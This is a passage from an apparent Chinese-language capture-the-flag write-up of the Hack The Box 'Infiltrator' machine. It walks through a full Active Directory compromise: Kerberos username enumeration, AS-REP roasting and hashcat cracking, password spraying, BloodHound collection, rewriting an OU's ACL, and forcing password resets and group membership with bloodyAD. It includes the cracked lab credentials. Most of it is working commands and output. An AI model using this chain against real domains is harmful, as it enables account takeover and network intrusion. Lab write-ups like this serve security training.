class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">└─$ cat AD_username </span><br><span class="line">david.anderson@infiltrator.htb</span><br><span class="line">david_anderson@infiltrator.htb</span><br><span class="line">d.anderson@infiltrator.htb</span><br><span class="line">d_anderson@infiltrator.htb</span><br><span class="line">olivia.martinez@infiltrator.htb</span><br><span class="line">olivia_martinez@infiltrator.htb</span><br><span class="line">o.martinez@infiltrator.htb</span><br><span class="line">o_martinez@infiltrator.htb</span><br><span class="line">kevin.turner@infiltrator.htb</span><br><span class="line">kevin_turner@infiltrator.htb</span><br><span class="line">k.turner@infiltrator.htb</span><br><span class="line">k_turner@infiltrator.htb</span><br><span class="line">amanda.walker@infiltrator.htb</span><br><span class="line">amanda_walker@infiltrator.htb</span><br><span class="line">a.walker@infiltrator.htb</span><br><span class="line">a_walker@infiltrator.htb</span><br><span class="line">marcus.harris@infiltrator.htb</span><br><span class="line">marcus_harris@infiltrator.htb</span><br><span class="line">m.harris@infiltrator.htb</span><br><span class="line">m_harris@infiltrator.htb</span><br><span class="line">lauren.clark@infiltrator.htb</span><br><span class="line">lauren_clark@infiltrator.htb</span><br><span class="line">l.clark@infiltrator.htb</span><br><span class="line">l_clark@infiltrator.htb</span><br><span class="line">ethan.rodriguez@infiltrator.htb</span><br><span class="line">ethan_rodriguez@infiltrator.htb</span><br><span class="line">e.rodriguez@infiltrator.htb</span><br><span class="line">e_rodriguez@infiltrator.htb</span><br></pre></td></tr></table></figure><p>这里用 <a href="https://github.com/ropnop/kerbrute">ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcing (github.com)</a></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">go install -v github.com/ropnop/kerbrute@latest</span><br></pre></td></tr></table></figure><p>这里我配置了dns服务器,所以非常舒适,</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">└─$ kerbrute userenum -d infiltrator.htb AD_username </span><br><span class="line"></span><br><span class="line"> __ __ __ </span><br><span class="line"> / /_____ _____/ /_ _______ __/ /____ </span><br><span class="line"> / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \</span><br><span class="line"> / ,< / __/ / / /_/ / / / /_/ / /_/ __/</span><br><span class="line">/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/ </span><br><span class="line"></span><br><span class="line">Version: dev (n/a) - 09/05/24 - Ronnie Flathers @ropnop</span><br><span class="line"></span><br><span class="line">2024/09/05 22:23:05 > Using KDC(s):</span><br><span class="line">2024/09/05 22:23:05 > dc01.infiltrator.htb:88</span><br><span class="line"></span><br><span class="line">2024/09/05 22:23:06 > [+] VALID USERNAME: o.martinez@infiltrator.htb</span><br><span class="line">2024/09/05 22:23:06 > [+] VALID USERNAME: d.anderson@infiltrator.htb</span><br><span class="line">2024/09/05 22:23:09 > [+] VALID USERNAME: k.turner@infiltrator.htb</span><br><span class="line">2024/09/05 22:23:09 > [+] VALID USERNAME: a.walker@infiltrator.htb</span><br><span class="line">2024/09/05 22:23:10 > [+] VALID USERNAME: m.harris@infiltrator.htb</span><br><span class="line">2024/09/05 22:23:10 > [+] VALID USERNAME: e.rodriguez@infiltrator.htb</span><br><span class="line">2024/09/05 22:23:13 > [+] VALID USERNAME: l.clark@infiltrator.htb</span><br><span class="line">2024/09/05 22:23:13 > Done! Tested 28 usernames (7 valid) in 8.431 seconds</span><br></pre></td></tr></table></figure><p>如果没有配置dns服务器<br>需要加上–dc dc01.infiltrator.htb<br>命令就要改为</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kerbrute userenum -d infiltrator.htb AD_username --dc dc01.infiltrator.htb</span><br></pre></td></tr></table></figure><p>将下列内容写入tmp</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">2024/09/05 22:23:06 > [+] VALID USERNAME: o.martinez@infiltrator.htb</span><br><span class="line">2024/09/05 22:23:06 > [+] VALID USERNAME: d.anderson@infiltrator.htb</span><br><span class="line">2024/09/05 22:23:09 > [+] VALID USERNAME: k.turner@infiltrator.htb</span><br><span class="line">2024/09/05 22:23:09 > [+] VALID USERNAME: a.walker@infiltrator.htb</span><br><span class="line">2024/09/05 22:23:10 > [+] VALID USERNAME: m.harris@infiltrator.htb</span><br><span class="line">2024/09/05 22:23:10 > [+] VALID USERNAME: e.rodriguez@infiltrator.htb</span><br><span class="line">2024/09/05 22:23:13 > [+] VALID USERNAME: l.clark@infiltrator.htb</span><br></pre></td></tr></table></figure><p>再次用awk进行切分,获得真正的用户名列表</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">└─$ cat tmp |awk -F' ' '{print $7}'</span><br><span class="line">o.martinez@infiltrator.htb</span><br><span class="line">d.anderson@infiltrator.htb</span><br><span class="line">k.turner@infiltrator.htb</span><br><span class="line">a.walker@infiltrator.htb</span><br><span class="line">m.harris@infiltrator.htb</span><br><span class="line">e.rodriguez@infiltrator.htb</span><br><span class="line">l.clark@infiltrator.htb</span><br><span class="line"></span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat tmp |awk -F' ' '{print $7}' > AD_usr</span><br></pre></td></tr></table></figure><h2 id="GetNPUsers"><a href="#GetNPUsers" class="headerlink" title="GetNPUsers"></a>GetNPUsers</h2><p>现在该整点HASH了</p><p>用impacket,如果是kali,是预装的,如果和我一样用了pyenv,而且还喜欢用global 导致系统原有的python被覆盖了。那么可以在<code>~/.zshrc</code><br>里加上<code>rm /home/kali/.pyenv/shims/python3</code><br>注意<code>/home/kali</code>是你的用户的home,不要照抄,除非你也是kali<br>这样可以避免影响系统的很多工具,而且可以快乐的用自己pyenv里的python,以免”整活”失败需要重新配环境</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">└─$ impacket-GetNPUsers infiltrator.htb/ -usersfile AD_usr -outputfile outputusers.txt -no-pass </span><br><span class="line">Impacket v0.12.0.dev1 - Copyright 2023 Fortra</span><br><span class="line"></span><br><span class="line">[-] User o.martinez@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set</span><br><span class="line">[-] User d.anderson@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set</span><br><span class="line">[-] User k.turner@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set</span><br><span class="line">[-] User a.walker@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set</span><br><span class="line">[-] User m.harris@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set</span><br><span class="line">[-] User e.rodriguez@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set</span><br><span class="line">$krb5asrep$23$l.clark@infiltrator.htb@INFILTRATOR.HTB:52c941038bffe158a729e721a83eca5c$2478d99303d3d9edfd1cbadb41a6463a2df4a97acdf4da4e2c185394c651e78019bb401643cd1c86cd20f9edc5b81025b12fcc553aaa2db741eee0ce7d0a2b86b6ef1a71bf90fb31d7d4cd5d7a6fb44a89cd64613d263e59d00910d52924d2dfb21a0c6db95e996cb51806865d536252484a78a81238161462bb029cdf37c0181e85f038578216f4653351edfb24c46e10faafe0536a539e7a2c52ffccd5503031c177e0564b1b431bc7e02cc1424628dd238503c0a1f58e5398dfb9d9985307f650f52f1165317a20617a2bb4aa2872113f6f3ceb218e226d97551dd599c3cff76e5b47bdfa6d8517f92733073d702951b4</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>如果没配DNS,记得加上<code>-dc-ip dc01.infiltrator.htb</code></p><p>也就是</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">impacket-GetNPUsers infiltrator.htb/ -usersfile AD_usr -outputfile outputusers.txt -no-pass -dc-ip dc01.infiltrator.htb</span><br></pre></td></tr></table></figure><p>然后将获取的这一串hash写入到文件里,等会用hashcat进行爆破<br>这里可以看到是 <a href="mailto:l.clark@infiltrator.htb">l.clark@infiltrator.htb</a> 用户的hash,就直接用它命名</p><h2 id="Hashcat"><a href="#Hashcat" class="headerlink" title="Hashcat"></a>Hashcat</h2><p>可以直接用hashcat来识别hash类型,然后在用-m 指定类型</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">└─$ hashcat l.clark@infiltrator.htb_hash </span><br><span class="line">hashcat (v6.2.6) starting in autodetect mode</span><br><span class="line"></span><br><span class="line">OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]</span><br><span class="line">==================================================================================================================================================</span><br><span class="line">* Device #1: cpu-haswell-AMD Ryzen 7 4800U with Radeon Graphics, 1439/2942 MB (512 MB allocatable), 8MCU</span><br><span class="line"></span><br><span class="line">Hash-mode was not specified with -m. Attempting to auto-detect hash mode.</span><br><span class="line">The following mode was auto-detected as the only one matching your input hash:</span><br><span class="line"></span><br><span class="line">18200 | Kerberos 5, etype 23, AS-REP | Network Protocol</span><br><span class="line"></span><br><span class="line">NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>这里可以看到他直接识别出来了 <code>18200 | Kerberos 5, etype 23, AS-REP | Network Protocol</code><br>后面就可以 <code>-m 18200</code></p><p>然后用上rockyou,冲就完事</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hashcat l.clark@infiltrator.htb_hash -a 0 -m 18200 /usr/share/wordlists/rockyou.txt</span><br></pre></td></tr></table></figure><p>谈笑间,秒了,使用 <code>--show</code>来查看结果</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">hashcat l.clark@infiltrator.htb_hash -a 0 -m 18200 /usr/share/wordlists/rockyou.txt --show</span><br><span class="line">$krb5asrep$23$l.clark@infiltrator.htb@INFILTRATOR.HTB:1877dab6354c43532e0888a464b5b166$1a5e7f261487819c2413695ebffd0d8d7237199d320d65523e864df65becf802953e64eb7203da62766c6d06e97aba69faa81752444745b8e115ee538295dbe58b935df7a5ace5731811932504c6dd57dd2175d4519a7cf4099a9e883dcf8cf9c7bb1097fa65c05ab463350cc144a0cb181f240002153e2e6950b3d9c38ad7b5187a1de9430a0014ea457c9fcc88cd0715f14b436ebfd13daec3764611a4e1e4df4923b9966272b5881589b38f6ca58a53cb7f5f4fc5eb040132e659fa6cd3bd8af53789fc9fcf5d59d793721786c6f0f7176da6fb25a1fda116ab806b1328762bf874b58493948b1ecc4d682bc336f451a2:WAT?watismypass!</span><br></pre></td></tr></table></figure><p>有趣有趣,这就有了一组凭据</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">l.clark@infiltrator.htb:WAT?watismypass!</span><br></pre></td></tr></table></figure><h1 id="域渗透"><a href="#域渗透" class="headerlink" title="域渗透"></a>域渗透</h1><p>psexec试下</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">└─$ impacket-psexec infiltrator.htb/l.clark:WAT?watismypass\!@dc01.infiltrator.htb </span><br><span class="line">Impacket v0.12.0.dev1 - Copyright 2023 Fortra</span><br><span class="line"></span><br><span class="line">[*] Requesting shares on dc01.infiltrator.htb.....</span><br><span class="line">[-] share 'ADMIN$' is not writable.</span><br><span class="line">[-] share 'C$' is not writable.</span><br><span class="line">[-] share 'NETLOGON' is not writable.</span><br><span class="line">[-] share 'SYSVOL' is not writable.</span><br></pre></td></tr></table></figure><p>Oh no~,我的权限不够</p><p><strong>psexec的前置条件</strong></p><ol><li>445端口开放</li><li>有可写入的共享目录</li></ol><p>其他的类似工具还有smbexec、atexec、 wmiexec、dcomexec<br>鉴于没有可写目录,那么就换atexec试试</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">─$ impacket-atexec infiltrator.htb/l.clark:WAT?watismypass\!@dc01.infiltrator.htb cmd </span><br><span class="line">Impacket v0.12.0.dev1 - Copyright 2023 Fortra</span><br><span class="line"></span><br><span class="line">[!] This will work ONLY on Windows >= Vista</span><br><span class="line">[*] Creating task \wPBwKvid</span><br><span class="line">[-] rpc_s_access_denied</span><br></pre></td></tr></table></figure><p>再换wmiexec</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">└─$ impacket-wmiexec infiltrator.htb/l.clark:WAT?watismypass\!@dc01.infiltrator.htb cmd</span><br><span class="line">Impacket v0.12.0.dev1 - Copyright 2023 Fortra</span><br><span class="line"></span><br><span class="line">[*] SMBv3.0 dialect used</span><br><span class="line">[-] WMI Session Error: code: 0x80041003 - WBEM_E_ACCESS_DENIED</span><br></pre></td></tr></table></figure><p>最后试下dcomexec,不行就得考虑别的思路了</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">└─$ impacket-dcomexec infiltrator.htb/l.clark:WAT?watismypass\!@dc01.infiltrator.htb cmd</span><br><span class="line">Impacket v0.12.0.dev1 - Copyright 2023 Fortra</span><br><span class="line"></span><br><span class="line">[*] SMBv3.0 dialect used</span><br><span class="line">[-] DCOM SessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.</span><br></pre></td></tr></table></figure><p>这就换、这就换<br>先做个字典newuser</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">└─$ cat AD_usr| awk -F '@' '{print $1}'</span><br><span class="line">o.martinez</span><br><span class="line">d.anderson</span><br><span class="line">k.turner</span><br><span class="line">a.walker</span><br><span class="line">m.harris</span><br><span class="line">e.rodriguez</span><br><span class="line">l.clark</span><br><span class="line">└─$ cat AD_usr| awk -F '@' '{print $1}' >newuser</span><br><span class="line"></span><br></pre></td></tr></table></figure><h2 id="密码喷射"><a href="#密码喷射" class="headerlink" title="密码喷射"></a>密码喷射</h2><p>确实只有这一个人用这个密码</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">└─$ crackmapexec smb 10.10.11.31 -u newuser -p pass</span><br><span class="line">SMB 10.10.11.31 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)</span><br><span class="line">SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\o.martinez:WAT?watismypass! STATUS_LOGON_FAILURE </span><br><span class="line">SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\d.anderson:WAT?watismypass! STATUS_ACCOUNT_RESTRICTION </span><br><span class="line">SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\k.turner:WAT?watismypass! STATUS_LOGON_FAILURE </span><br><span class="line">SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\a.walker:WAT?watismypass! STATUS_LOGON_FAILURE </span><br><span class="line">SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\m.harris:WAT?watismypass! STATUS_ACCOUNT_RESTRICTION </span><br><span class="line">SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\e.rodriguez:WAT?watismypass! STATUS_LOGON_FAILURE </span><br><span class="line">SMB 10.10.11.31 445 DC01 [+] infiltrator.htb\l.clark:WAT?watismypass! </span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">infiltrator.htb\d.anderson:WAT?watismypass! STATUS_ACCOUNT_RESTRICTION </span><br><span class="line">infiltrator.htb\m.harris:WAT?watismypass! STATUS_ACCOUNT_RESTRICTION</span><br></pre></td></tr></table></figure><p>d.anderson和m.harris有点异常,会不会这个密码可以复用</p><h2 id="getTGT"><a href="#getTGT" class="headerlink" title="getTGT"></a>getTGT</h2><p>很神奇,这密码d.anderson他真的在用</p><p>用新加坡的节点就报这个错<br><strong>Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)</strong><br>用美国节点就好了</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">└─$ impacket-getTGT infiltrator.htb/d.anderson:'WAT?watismypass!' -dc-ip dc01.infiltrator.htb</span><br><span class="line">Impacket v0.12.0.dev1 - Copyright 2023 Fortra</span><br><span class="line"></span><br><span class="line">[*] Saving ticket in d.anderson.ccache</span><br></pre></td></tr></table></figure><h2 id="bloodhound"><a href="#bloodhound" class="headerlink" title="bloodhound"></a>bloodhound</h2><p>使用python采集器</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bloodhound-python -d infiltrator.htb -u l.clark -p "WAT?watismypass\!" -c all --dns-tcp --zip</span><br></pre></td></tr></table></figure><p>确实可以搜集,但<code>l.clark</code>确实没啥用<br><code>d.anderson</code>跑一下</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">└─$ bloodhound-python -d infiltrator.htb -u d.anderson -p 'WAT?watismypass!' -c all -ns 10.10.11.31 --zip </span><br><span class="line">INFO: Found AD domain: infiltrator.htb</span><br><span class="line">INFO: Getting TGT for user</span><br><span class="line">INFO: Connecting to LDAP server: dc01.infiltrator.htb</span><br><span class="line">INFO: Found 1 domains</span><br><span class="line">INFO: Found 1 domains in the forest</span><br><span class="line">INFO: Found 1 computers</span><br><span class="line">INFO: Connecting to LDAP server: dc01.infiltrator.htb</span><br><span class="line">INFO: Found 14 users</span><br><span class="line">INFO: Found 58 groups</span><br><span class="line">INFO: Found 2 gpos</span><br><span class="line">INFO: Found 2 ous</span><br><span class="line">INFO: Found 19 containers</span><br><span class="line">INFO: Found 0 trusts</span><br><span class="line">INFO: Starting computer enumeration with 10 workers</span><br><span class="line">INFO: Querying computer: dc01.infiltrator.htb</span><br><span class="line">INFO: Done in 01M 03S</span><br><span class="line">INFO: Compressing output into 20240906085109_bloodhound.zip</span><br><span class="line"></span><br></pre></td></tr></table></figure><p><code>d.anderson</code>真的有用<br>重新导入这个数据时记得清空session和database免得出现奇奇怪怪的错误<br><img src="https://gcore.jsdelivr.net/gh/bilibiliganb/mypic/img20240906215945.png"><br>有一条完整的攻击链</p><h3 id="x44-46-x41-x4e-68-69-x52-83-x4f-78-64-73-78-70-x49-76-84-82-65-84-x4f-x52-x2e-x48-84-x42-—GenericAll—-MARKETING-x44-x49-71-x49-x54-65-x4c-64-x49-x4e-x46-73-76-x54-82-65-x54-79-x52-x2e-x48-x54-x42"><a href="#x44-46-x41-x4e-68-69-x52-83-x4f-78-64-73-78-70-x49-76-84-82-65-84-x4f-x52-x2e-x48-84-x42-—GenericAll—-MARKETING-x44-x49-71-x49-x54-65-x4c-64-x49-x4e-x46-73-76-x54-82-65-x54-79-x52-x2e-x48-x54-x42" class="headerlink" title="D.ANDERSON@INFILTRATOR.HTB —GenericAll—>MARKETING DIGITAL@INFILTRATOR.HTB"></a><a href="mailto:D.ANDERSON@INFILTRATOR.HTB">D.ANDERSON@INFILTRATOR.HTB</a> —GenericAll—>MARKETING <a href="mailto:DIGITAL@INFILTRATOR.HTB">DIGITAL@INFILTRATOR.HTB</a></h3><p>看看说明书<br><img src="https://gcore.jsdelivr.net/gh/bilibiliganb/mypic/img20240906220204.png"><br>看下面的解释<br>这也称为完全控制。此权限允许受托人以任何他们想要的方式操纵目标对象。<br>那么首先就修改ACL让我现在的d.anderson用户获得OU=MARKETING DIGITAL的FullControl</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">└─$ export KRB5CCNAME=d.anderson.ccache</span><br><span class="line"></span><br><span class="line">└─$ dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip dc01.infiltrator.htb</span><br><span class="line">Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies </span><br><span class="line"></span><br><span class="line">[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU</span><br><span class="line">[*] DACL backed up to dacledit-20240906-093926.bak</span><br><span class="line">[*] DACL modified successfully!</span><br><span class="line"></span><br></pre></td></tr></table></figure><h3 id="MARKETING-68-x49-x47-73-84-65-x4c-x40-x49-78-x46-x49-x4c-x54-x52-x41-x54-79-82-46-72-84-66-—Contains—-69-x2e-82-79-x44-x52-73-71-x55-x45-90-x40-x49-78-70-73-x4c-84-x52-65-84-x4f-x52-x2e-72-84-x42"><a href="#MARKETING-68-x49-x47-73-84-65-x4c-x40-x49-78-x46-x49-x4c-x54-x52-x41-x54-79-82-46-72-84-66-—Contains—-69-x2e-82-79-x44-x52-73-71-x55-x45-90-x40-x49-78-70-73-x4c-84-x52-65-84-x4f-x52-x2e-72-84-x42" class="headerlink" title="MARKETING DIGITAL@INFILTRATOR.HTB —Contains—>E.RODRIGUEZ@INFILTRATOR.HTB"></a>MARKETING <a href="mailto:DIGITAL@INFILTRATOR.HTB">DIGITAL@INFILTRATOR.HTB</a> —Contains—><a href="mailto:E.RODRIGUEZ@INFILTRATOR.HTB">E.RODRIGUEZ@INFILTRATOR.HTB</a></h3><p>我都可以完全控制”MARKETING <a href="mailto:DIGITAL@INFILTRATOR.HTB">DIGITAL@INFILTRATOR.HTB</a> “了,既然e.rodriguez在这个组,那就改它的密码,这样就可以使用它</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python /opt/AD_tools/bloodyAD/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip 10.10.11.31 -u "d.anderson" -p "WAT?watismypass\!" set password "e.rodriguez" "QWEasd123@123" </span><br></pre></td></tr></table></figure><p><img src="https://gcore.jsdelivr.net/gh/bilibiliganb/mypic/img20240906221253.png"></p><p>可以看到要快点执行,不然就因为那个什么</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Password can't be changed before -2 days, 23:55:48.953082 because of the minimum password age policy.</span><br></pre></td></tr></table></figure><p>神奇的错误不让我改密码</p><h3 id="69-x2e-82-x4f-x44-x52-73-x47-x55-x45-90-64-x49-78-x46-x49-x4c-84-x52-65-x54-79-82-46-x48-84-66-45-45-x2d-x61-100-100-115-101-x6c-f—-CHIEFS-77-x41-x52-75-x45-84-73-x4e-71-64-x49-x4e-70-x49-x4c-84-82-x41-84-x4f-82-x2e-72-x54-66"><a href="#69-x2e-82-x4f-x44-x52-73-x47-x55-x45-90-64-x49-78-x46-x49-x4c-84-x52-65-x54-79-82-46-x48-84-66-45-45-x2d-x61-100-100-115-101-x6c-f—-CHIEFS-77-x41-x52-75-x45-84-73-x4e-71-64-x49-x4e-70-x49-x4c-84-82-x41-84-x4f-82-x2e-72-x54-66" class="headerlink" title="E.RODRIGUEZ@INFILTRATOR.HTB---addself—>CHIEFS MARKETING@INFILTRATOR.HTB"></a><a href="mailto:E.RODRIGUEZ@INFILTRATOR.HTB---addsel">E.RODRIGUEZ@INFILTRATOR.HTB---addsel</a>f—>CHIEFS <a href="mailto:MARKETING@INFILTRATOR.HTB">MARKETING@INFILTRATOR.HTB</a></h3><p>意思是让我用e.rodriguez这个账号把自己加入到组“CHIEFS <a href="mailto:MARKETING@INFILTRATOR.HTB">MARKETING@INFILTRATOR.HTB</a>”</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">getTGT.py infiltrator.htb/"e.rodriguez":"QWEasd123@123" -dc-ip dc01.infiltrator.htb</span><br><span class="line"></span><br><span class="line">KRB5CCNAME=e.rodriguez.ccache</span><br><span class="line"></span><br><span class="line">python /opt/AD_tools/bloodyAD/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --dc-ip 10.10.11.31 -u e.rodriguez -k add groupMember "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB" e.rodriguez</span><br><span class="line"></span><br></pre></td></tr></table></figure><h3 id="CHIEFS-77-x41-82-x4b-69-84-73-78-71-x40-x49-x4e-70-73-76-x54-82-x41-84-x4f-x52-46-72-84-x42-45-x2d-x2d-x66-111-x72-x63-x65-99-x68-97-x6e-103-x65-112-97-115-x73-119-111-x72-d—-77-x2e-x48-x41-82-x52-x49-x53-x40-73-x4e-x46-x49-x4c-x54-x52-65-84-x4f-x52-x2e-72-x54-66"><a href="#CHIEFS-77-x41-82-x4b-69-84-73-78-71-x40-x49-x4e-70-73-76-x54-82-x41-84-x4f-x52-46-72-84-x42-45-x2d-x2d-x66-111-x72-x63-x65-99-x68-97-x6e-103-x65-112-97-115-x73-119-111-x72-d—-77-x2e-x48-x41-82-x52-x49-x53-x40-73-x4e-x46-x49-x4c-x54-x52-65-84-x4f-x52-x2e-72-x54-66" class="headerlink" title="CHIEFS MARKETING@INFILTRATOR.HTB---forcechangepassword—> M.HARRIS@INFILTRATOR.HTB"></a>CHIEFS <a href="mailto:MARKETING@INFILTRATOR.HTB---forcechangepasswor">MARKETING@INFILTRATOR.HTB---forcechangepasswor</a>d—> <a href="mailto:M.HARRIS@INFILTRATOR.HTB">M.HARRIS@INFILTRATOR.HTB</a></h3><p>由于e.rodriguez账号加入了CHIEFS <a href="mailto:MARKETING@INFILTRATOR.HTB">MARKETING@INFILTRATOR.HTB</a>组,就可以使用e.rodriguez账号强制修改 <a href="mailto:M.HARRIS@INFILTRATOR.HTB">M.HARRIS@INFILTRATOR.HTB</a>的密码</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">KRB5CCNAME=e.rodriguez.ccache</span><br><span class="line"></span><br><span class="line">python /opt/AD_tools/bloodyAD/bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" 